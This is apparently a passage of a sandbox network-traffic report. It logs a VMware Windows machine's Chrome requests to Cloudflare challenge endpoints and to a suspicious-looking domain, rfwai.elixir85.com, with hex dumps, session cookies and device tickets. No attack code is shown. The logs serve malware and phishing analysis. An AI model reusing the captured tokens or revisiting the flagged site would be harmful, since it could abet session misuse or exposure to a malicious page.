                                                        2024-07-03 19:07:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:07:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4f 6d 43 33 31 32 34 78 65 6b 75 4d 44 68 61 7a 5a 73 58 37 53 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: OmC3124xekuMDhazZsX7SQ.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.54977240.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 59 38 58 73 74 75 35 42 75 6b 6d 67 41 6f 42 69 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 30 61 35 30 31 37 61 61 65 36 63 31 63 64 62 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: Y8Xstu5BukmgAoBi.1Context: 90a5017aae6c1cdb
                                                        2024-07-03 19:07:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:07:09 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 59 38 58 73 74 75 35 42 75 6b 6d 67 41 6f 42 69 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 30 61 35 30 31 37 61 61 65 36 63 31 63 64 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 65 64 71 39 69 6b 77 4f 2b 42 6c 6f 57 32 4a 71 59 70 46 78 73 2f 43 74 57 6f 35 48 58 48 5a 6d 59 53 39 65 66 6e 56 2f 67 55 34 4d 33 73 4c 4d 6c 55 42 79 38 6d 2b 41 63 35 64 32 50 34 53 4b 66 38 4d 53 57 6f 2b 59 30 5a 55 57 41 48 56 4a 79 44 61 2f 76 5a 6b 61 55 52 44 6a 77 71 51 77 68 4c 42 78 44 61 34 34 49 77 6a
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: Y8Xstu5BukmgAoBi.2Context: 90a5017aae6c1cdb<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwedq9ikwO+BloW2JqYpFxs/CtWo5HXHZmYS9efnV/gU4M3sLMlUBy8m+Ac5d2P4SKf8MSWo+Y0ZUWAHVJyDa/vZkaURDjwqQwhLBxDa44Iwj
                                                        2024-07-03 19:07:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 59 38 58 73 74 75 35 42 75 6b 6d 67 41 6f 42 69 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 30 61 35 30 31 37 61 61 65 36 63 31 63 64 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: Y8Xstu5BukmgAoBi.3Context: 90a5017aae6c1cdb<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-07-03 19:07:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:07:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 39 6a 68 4c 30 62 48 7a 59 6b 71 78 48 71 65 47 57 63 66 6e 69 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: 9jhL0bHzYkqxHqeGWcfnig.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.549773104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:14 UTC917OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 32727
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Content-type: application/x-www-form-urlencoded
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        CF-Challenge: 9126e412fd5a54e
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:14 UTC16384OUTData Raw: 76 5f 38 39 64 39 32 37 62 62 30 38 35 39 34 32 32 64 3d 2d 76 59 37 33 48 4d 36 73 4d 39 71 59 46 6f 39 46 39 73 37 6e 73 4d 71 47 4c 47 75 47 4a 37 68 67 4d 4c 47 44 4c 38 47 47 70 48 6c 59 47 2d 48 47 4a 59 47 58 47 50 37 6e 39 69 6e 78 47 65 37 32 39 4d 65 24 44 38 78 76 47 35 56 67 47 24 47 69 33 49 48 47 51 37 77 6b 4c 33 47 6a 63 67 47 49 2d 59 31 6e 47 6e 61 59 47 32 53 66 6a 6f 44 36 38 73 37 2d 25 32 62 76 76 38 56 32 71 61 67 47 6d 44 47 47 6d 52 47 77 39 4d 53 52 69 38 71 4d 4a 69 70 6c 34 47 48 66 75 52 6d 63 52 47 32 69 67 75 33 75 57 4a 63 50 6c 39 67 46 6d 71 59 4d 41 64 42 36 47 69 35 71 47 4d 42 39 54 68 4c 53 46 39 4c 59 4d 68 4c 58 38 64 59 43 6f 37 71 42 6c 70 79 76 51 31 54 4a 32 6b 4a 58 34 49 42 53 56 53 6f 6c 38 30 61 48 72 33 42
                                                        Data Ascii: v_89d927bb0859422d=-vY73HM6sM9qYFo9F9s7nsMqGLGuGJ7hgMLGDL8GGpHlYG-HGJYGXGP7n9inxGe729Me$D8xvG5VgG$Gi3IHGQ7wkL3GjcgGI-Y1nGnaYG2SfjoD68s7-%2bvv8V2qagGmDGGmRGw9MSRi8qMJipl4GHfuRmcRG2igu3uWJcPl9gFmqYMAdB6Gi5qGMB9ThLSF9LYMhLX8dYCo7qBlpyvQ1TJ2kJX4IBSVSol80aHr3B
                                                        2024-07-03 19:07:14 UTC16343OUTData Raw: 67 61 37 55 47 68 59 48 69 4d 52 50 24 59 45 43 6e 7a 77 70 77 54 34 68 57 33 67 24 70 71 35 50 71 47 46 47 69 67 4d 31 47 4d 47 69 47 4d 66 47 64 36 47 24 4d 6f 33 58 37 48 74 50 46 37 35 37 48 67 62 6d 47 4a 37 46 76 4d 48 4b 55 67 47 62 47 4f 47 6a 67 71 6c 4f 6b 47 2d 67 48 37 4d 64 70 68 67 71 6e 4d 33 47 55 70 77 6e 47 69 78 24 67 71 6f 67 24 47 36 71 71 47 48 36 51 68 71 77 38 45 70 70 46 70 69 24 4b 4d 68 67 73 77 62 4d 79 52 32 47 4d 57 6c 32 37 47 47 68 69 4d 39 47 71 47 4a 77 47 67 47 55 37 77 62 4d 68 73 4d 6e 71 6f 7a 35 47 66 61 46 59 4d 61 47 7a 47 32 39 4d 62 47 6c 6e 4d 47 4d 34 47 4a 38 4e 71 47 61 47 74 6c 4d 47 47 46 47 77 47 2d 6e 47 70 47 49 37 38 62 47 48 47 73 70 4d 6e 47 73 47 71 37 74 6a 47 63 67 7a 39 47 6d 4d 72 70 4d 67 4a 76
                                                        Data Ascii: ga7UGhYHiMRP$YECnzwpwT4hW3g$pq5PqGFGigM1GMGiGMfGd6G$Mo3X7HtPF757HgbmGJ7FvMHKUgGbGOGjgqlOkG-gH7MdphgqnM3GUpwnGix$gqog$G6qqGH6Qhqw8EppFpi$KMhgswbMyR2GMWl27GGhiM9GqGJwGgGU7wbMhsMnqoz5GfaFYMaGzG29MbGlnMGM4GJ8NqGaGtlMGGFGwG-nGpGI78bGHGspMnGsGq7tjGcgz9GmMrpMgJv
                                                        2024-07-03 19:07:14 UTC1257INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 3420
                                                        Connection: close
                                                        cf-chl-out: b/gxjo7T62HFY6A7H7QBBvsOEjMHVc4eM7eo3m83zW7oE5te0FLf1JxiI2NYGLSN0bKhtHrjpESgS6+ZlvVc05nxsh8yf13fzL38GIJgQpojb2PpbGI4C7x5HI8FKgS5$mOlx8wEuf8KS54KDkVxD8A==
                                                        cf-chl-out-s: N//CeJMHntH5svOUd1Gu+5tlzy1j0qvSJmQy1bq+O6PicmypM3mSLD+NpoD+nB8Nt1g4CFHbHEPGE2rEhSwGYiqOSf+em1Fo5G7DmMS80fwZvreS/wOly3K66HVvbM5dLzUhSr7Z7LUv6bZFmaw51gja59zkCVw5DLhkI23oTjK0W0G/MdGpmmyPIePBbV7HVwowZ6sT4CiiBFswhKfY/3wT7EBTo7gxwBkuj1GuqErtSNa1qOHQMmp025jeafP/N98YaHDc9+zsTLDj6k+4drtSK7DuuxpHU8grojnUtoRWia+1NyuJqzVVVjk6jUyUZx7D5JqoUidpsnLgIESgAl8TAVpUS83MhaBaZJBAU3K+iH5CTnTNXSDJG/y/tSbA5jyJmjuj9EshV6sJsH+JiUDtMxxCiuo2ZuTFr+nbwKup9BDG7LGnCYOLhh1xytWSxJGs0pZ+O/kw/Ccpon6i+TxGuJ+UsBMzEVmMw3IFNxj8Xh2hGYZQS6i90snjZEjnOhVMkkkIz5dnyOiVgHcAtTCPr/9Xq/znu6s+GPwg523tBU6Pf2oiIfHR8bYC64U8tsTdUfHJHJ1Pjr+kvJCFuGzINe4jxFzcINcuADk6yw5bMjFAfw5byNn7xGwuvN9gnSlzdu+M06kM8+uVQqpGDSdta25mqq6czzQlhMugxpkfE30ERW9GiS8GTOfbiPYXRuaeLZDXoz0boGXAhiEN3GcfRNNHeT2o3VDTxKOYDr8iccyvrNovnybu2QOwdrI1SPEXbj/hBTl80+kEMD5Qbz6/4Yx38GWRQheL1VHWXfmm2/9U33HobbTctiSA5mpq$IFEi+dCEH0fQBnLSjkuV7Q==
                                                        Server: cloudflare
                                                        CF-RAY: 89d92845eec417a5-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:07:14 UTC112INData Raw: 72 62 4f 32 66 4a 61 62 65 4d 4f 59 74 59 31 2b 6e 71 61 46 6e 38 53 46 7a 4d 71 2b 6f 4b 62 4b 70 71 2f 4f 79 4b 2f 57 74 61 61 61 32 72 43 59 6e 63 37 52 6d 35 76 6c 30 75 4b 78 77 4d 57 30 74 63 54 4a 74 71 57 34 35 71 36 6c 79 39 44 41 34 4f 62 30 31 64 62 61 30 75 7a 65 33 63 48 61 32 37 33 50 38 73 44 6a 76 38 6e 42 34 39 7a 47
                                                        Data Ascii: rbO2fJabeMOYtY1+nqaFn8SFzMq+oKbKpq/OyK/Wtaaa2rCYnc7Rm5vl0uKxwMW0tcTJtqW45q6ly9DA4Ob01dba0uze3cHa273P8sDjv8nB49zG
                                                        2024-07-03 19:07:14 UTC1369INData Raw: 7a 4d 62 6a 43 78 44 68 36 66 50 6a 38 64 44 35 35 77 33 70 46 4e 73 56 2b 50 45 52 42 51 4d 6f 46 2f 6f 44 4b 42 54 6d 41 79 59 65 36 77 6f 7a 49 69 51 78 4a 78 63 47 46 78 77 63 43 43 6b 57 48 68 34 31 46 68 38 68 39 78 30 64 4d 2f 73 66 51 41 68 47 4f 45 5a 48 55 6b 56 52 48 53 41 58 51 69 38 32 47 77 35 63 48 54 63 53 54 78 6c 51 59 32 45 59 48 57 63 39 4f 44 78 43 57 30 39 4a 51 44 70 4e 4c 6b 56 6f 52 32 74 49 64 56 70 77 57 57 31 33 58 6e 4a 66 50 30 31 31 50 7a 39 33 5a 6c 71 4b 56 6b 52 48 67 59 78 51 59 6e 4e 63 56 47 53 56 56 6d 53 54 57 6c 56 53 57 35 74 63 63 70 39 30 69 31 39 34 70 71 42 69 6b 61 4a 71 66 49 71 44 65 71 71 69 72 33 2b 65 71 58 61 76 6d 4a 70 73 73 59 6c 35 72 62 65 66 72 48 79 50 6f 6f 57 42 70 62 4b 6b 71 34 57 55 6c 5a 65
                                                        Data Ascii: zMbjCxDh6fPj8dD55w3pFNsV+PERBQMoF/oDKBTmAyYe6wozIiQxJxcGFxwcCCkWHh41Fh8h9x0dM/sfQAhGOEZHUkVRHSAXQi82Gw5cHTcSTxlQY2EYHWc9ODxCW09JQDpNLkVoR2tIdVpwWW13XnJfP011Pz93ZlqKVkRHgYxQYnNcVGSVVmSTWlVSW5tccp90i194pqBikaJqfIqDeqqir3+eqXavmJpssYl5rbefrHyPooWBpbKkq4WUlZe
                                                        2024-07-03 19:07:14 UTC1369INData Raw: 41 62 53 41 2b 63 59 36 74 7a 6f 39 4e 76 30 46 42 54 66 2b 75 30 53 49 52 67 71 4b 69 59 58 35 75 7a 39 38 42 6f 7a 36 77 67 69 37 6a 4c 34 4b 77 59 4a 4b 51 6b 62 4f 77 48 2b 50 30 41 30 51 79 4d 43 4e 44 5a 4a 52 6a 67 48 54 30 74 4b 4c 6b 41 6b 45 30 63 75 56 69 78 59 4f 43 70 48 56 45 42 68 4e 56 63 37 4d 79 52 62 4f 57 68 5a 51 6c 51 38 4e 30 6c 45 63 56 73 73 52 33 56 50 51 55 6c 35 4f 48 4e 51 53 6d 77 31 61 55 35 77 67 31 64 54 68 45 46 34 69 56 4a 2f 59 34 78 6d 53 47 64 65 69 34 68 39 5a 47 6d 50 62 35 6c 69 55 58 79 63 6a 4a 43 48 63 57 74 71 68 46 74 35 6d 49 68 33 66 5a 79 64 65 34 46 74 6e 4c 47 62 63 61 32 56 73 37 4f 54 74 4b 36 70 67 34 6d 62 64 37 75 4b 6a 62 4c 41 6d 6f 4f 69 77 72 2f 42 71 59 69 31 6c 38 58 49 68 72 4b 45 78 38 76 52
                                                        Data Ascii: AbSA+cY6tzo9Nv0FBTf+u0SIRgqKiYX5uz98Boz6wgi7jL4KwYJKQkbOwH+P0A0QyMCNDZJRjgHT0tKLkAkE0cuVixYOCpHVEBhNVc7MyRbOWhZQlQ8N0lEcVssR3VPQUl5OHNQSmw1aU5wg1dThEF4iVJ/Y4xmSGdei4h9ZGmPb5liUXycjJCHcWtqhFt5mIh3fZyde4FtnLGbca2Vs7OTtK6pg4mbd7uKjbLAmoOiwr/BqYi1l8XIhrKEx8vR
                                                        2024-07-03 19:07:14 UTC570INData Raw: 58 61 39 77 73 43 48 51 51 45 39 52 34 51 46 52 77 5a 4b 78 6f 4f 41 2b 41 6a 4a 4f 6b 67 49 68 62 6e 49 79 51 77 45 79 51 79 39 69 59 61 4d 79 4c 35 50 53 30 39 45 43 51 31 4d 52 51 71 4f 78 77 58 4f 45 4d 79 4b 30 41 2f 54 45 55 33 4e 79 63 6b 54 45 67 36 58 52 5a 52 56 69 77 38 55 44 4e 64 5a 56 4a 64 4b 69 56 68 56 55 68 65 5a 6c 45 2f 63 46 4d 78 51 45 31 76 53 57 31 73 63 30 39 48 61 6d 6c 30 67 59 4a 75 5a 54 35 46 5a 6b 56 72 69 33 39 63 65 55 64 36 54 59 4a 65 63 58 31 67 63 34 4e 56 56 70 65 49 6b 4a 70 37 6c 59 4b 4e 6f 59 36 47 58 71 65 54 6e 6f 65 59 6a 47 65 65 68 70 36 41 73 5a 43 53 6c 61 32 59 71 59 6d 75 6b 35 74 34 73 70 47 77 74 5a 75 73 70 4a 4f 67 6e 4c 6d 70 67 35 2b 39 71 35 69 68 77 59 7a 4b 71 4c 4c 49 6a 73 47 32 7a 4e 71 76 75
                                                        Data Ascii: Xa9wsCHQQE9R4QFRwZKxoOA+AjJOkgIhbnIyQwEyQy9iYaMyL5PS09ECQ1MRQqOxwXOEMyK0A/TEU3NyckTEg6XRZRViw8UDNdZVJdKiVhVUheZlE/cFMxQE1vSW1sc09Haml0gYJuZT5FZkVri39ceUd6TYJecX1gc4NVVpeIkJp7lYKNoY6GXqeTnoeYjGeehp6AsZCSla2YqYmuk5t4spGwtZuspJOgnLmpg5+9q5ihwYzKqLLIjsG2zNqvu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.549775104.17.3.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:14 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:15 UTC375INHTTP/1.1 404 Not Found
                                                        Date: Wed, 03 Jul 2024 19:07:15 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 7
                                                        Connection: close
                                                        cf-chl-out: 7j8SxhPmuMHMx8J+6Gd81Q==$KlvkNg1hiJ+R8XxXLOnDeA==
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Server: cloudflare
                                                        CF-RAY: 89d9284ad85f19c3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:07:15 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                        Data Ascii: invalid


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.549774104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:14 UTC1430OUTPOST /veVvvrbtHetJlBWJqFj8ZEAe7Nkuts2OfI7xSK2rw HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        Content-Length: 1236
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXI2pY7kqEZwXWebN
                                                        Accept: */*
                                                        Origin: https://rfwai.elixir85.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rfwai.elixir85.com/RfWAi/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6Ik85WmNPeGFtNzFCRmZENHVOYmliOEE9PSIsInZhbHVlIjoiaFdXZDIrMXFxbGxvSHN0UzdvN3hGdHRETGl1MFR3R2h5MFVjMHhiSktjV01GeWsrTHgrT3lwMmpWY00vcGQzaW4yLy8rQ1dDNmQ2VW80WXpZT3VhWVlTUTA2SlExYTdpMVBhT1hkRVdVYVFlMG4rMlh3SUJXVlZJa2kyVVUrTk0iLCJtYWMiOiJhMmRjNTNjM2UyMmI3NjcyMmY0YTE5MjZlOThjMmEyZWViMWQ0MGUzOGU0ZDMwNzk0MDQwNDIwMzVkNzcxODU4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkxpcnF4Um5kMjBRai9UcjRVNHg5Z1E9PSIsInZhbHVlIjoiMVREMG4ydDhhbUhKZzVZbmxXK0pHdnFmKzZVWlF4Q1NuMFRudmlJeWVrYmQvMmpxOFB0Rm1lSFJ2RlZuOTVraHNnZzZQbC85c2xRYVZHNUp1UlNOVDRIQy83S3RaMmM0cFVrYlhadlVFbTdQV0ZIRzdJSHZWbjVQS1BMSnlwb1IiLCJtYWMiOiI0NjE0ZjhjZDdmZDMyYjUxNGYwYjczZWQyZDBmMWNmNTFlMDA0ZTUyNWZmN2Q0M2IwY2Q4MDUyODc1MzM1MDZkIiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:14 UTC1236OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 58 49 32 70 59 37 6b 71 45 5a 77 58 57 65 62 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 74 7a 30 70 4c 63 48 76 5a 76 32 44 36 57 44 6a 58 30 56 53 7a 59 49 61 38 45 75 74 38 31 48 4f 33 53 43 42 56 4f 75 44 68 66 41 35 5a 79 34 75 45 69 54 4a 73 6c 64 35 32 48 71 57 66 6f 49 70 69 63 6b 55 45 65 6b 62 70 33 6c 7a 58 66 66 2d 48 33 56 78 4a 43 4e 41 51 56 66 74 61 31 4b 4b 53 57 7a 63 69 51 36 48 41 57 45 6f 79 78 69 61 41 7a 62 49 74 6d 44 5f 5a 38 67 76 45 42 51 69 2d 7a 52 41 62 78 49 32 66 57 35 2d 39 35 54 33 63 2d 56
                                                        Data Ascii: ------WebKitFormBoundaryXI2pY7kqEZwXWebNContent-Disposition: form-data; name="cf-turnstile-response"0.tz0pLcHvZv2D6WDjX0VSzYIa8Eut81HO3SCBVOuDhfA5Zy4uEiTJsld52HqWfoIpickUEekbp3lzXff-H3VxJCNAQVfta1KKSWzciQ6HAWEoyxiaAzbItmD_Z8gvEBQi-zRAbxI2fW5-95T3c-V
                                                        2024-07-03 19:07:15 UTC997INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:15 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OlRFN2JERbBPdPvyEkrGGrfpn1irAOCsafAnWcoqdwaYTZOlQaTVgRsVWqNHfFun2hCaytTZPhy4bpKVS8ItNP%2BoLGmoOPVrsnNGXhiCMKPmHY%2FLt%2FZC6JO2zXoj1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6InBaRm5LZmdUOUtQbEl2Q2xaVUdHaXc9PSIsInZhbHVlIjoiMDZXaWZ2NSt3bUM5aVUvbWdxVzE3SG0xRjFTMVRNcy9NVWkrbFhBV1V4ZmRrU3NWYzlnM2U4UHUzQkJYYnNzOTZib1pTN0ZtSUtvTk5MVWJ2OUFmdHJnUFRqcFpQaVF4MTd1aEVHM1g3ZDBoZS81ckhQTzlpMW8wcTIzNVV3SGEiLCJtYWMiOiI1ODA1YzM0Yjg4MTc3NzU5ODUzMThlYjIwODU0OWIzZDkzMzM4N2M1YWVmMDg3Yjc4MWY0Y2M1MjU0ZjkwY2QzIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 21:07:15 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-07-03 19:07:15 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 42 57 54 54 4a 6a 65 57 4e 7a 4c 31 46 48 59 7a 56 73 55 30 30 7a 5a 6a 42 76 5a 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 33 52 57 59 33 4a 32 62 6e 6f 32 61 30 73 7a 63 46 70 45 63 44 6c 51 59 57 70 42 61 6c 42 77 53 30 70 79 62 7a 42 54 4d 58 56 7a 55 31 46 4a 4f 55 52 6e 65 6d 4a 6c 65 6c 64 4c 62 32 52 35 61 57 5a 49 5a 48 56 47 5a 47 5a 4a 57 57 39 32 4e 45 34 76 4b 32 63 30 51 53 73 7a 4e 44 56 75 5a 46 63 32 59 30 67 79 4d 54 42 6b 53 48 5a 57 53 6c 56 4c 53 54 49 7a 4d 53 38 78 5a 31 45 77 53 58 64 53 63 54 46 53 59 6c 4a 45 55 33 6b 34 4d 6b 56 7a 52 46 63 7a 55 45 6f 33 62 55 35 59 4f 45 46 47 54 43 73 30 56 48 55
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlBWTTJjeWNzL1FHYzVsU00zZjBvZHc9PSIsInZhbHVlIjoiQ3RWY3J2bno2a0szcFpEcDlQYWpBalBwS0pybzBTMXVzU1FJOURnemJleldLb2R5aWZIZHVGZGZJWW92NE4vK2c0QSszNDVuZFc2Y0gyMTBkSHZWSlVLSTIzMS8xZ1EwSXdScTFSYlJEU3k4MkVzRFczUEo3bU5YOEFGTCs0VHU
                                                        2024-07-03 19:07:15 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                        Data Ascii: 14{"status":"success"}
                                                        2024-07-03 19:07:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.549776104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:16 UTC1467OUTGET /RfWAi/ HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
